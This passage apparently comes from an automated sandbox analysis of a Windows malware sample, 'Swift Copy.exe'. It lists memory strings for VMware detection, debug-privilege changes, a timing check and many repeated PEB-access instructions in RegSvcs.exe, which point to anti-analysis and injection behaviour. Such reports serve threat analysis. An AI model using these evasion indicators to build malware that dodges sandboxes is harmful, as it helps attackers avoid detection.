          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
          Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 0000000B.00000000.327235591.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F6B90 rdtsc
          Source: C:\Users\user\Desktop\Swift Copy.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01943884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01943884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01947016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01994015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01994015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01982073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01991074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0197D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01995BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01904A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01904A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01954257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0198EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0190927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0197B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0197B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01998A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_019905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_018F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01946DC9 mov eax, dword ptr fs:[00000030h]
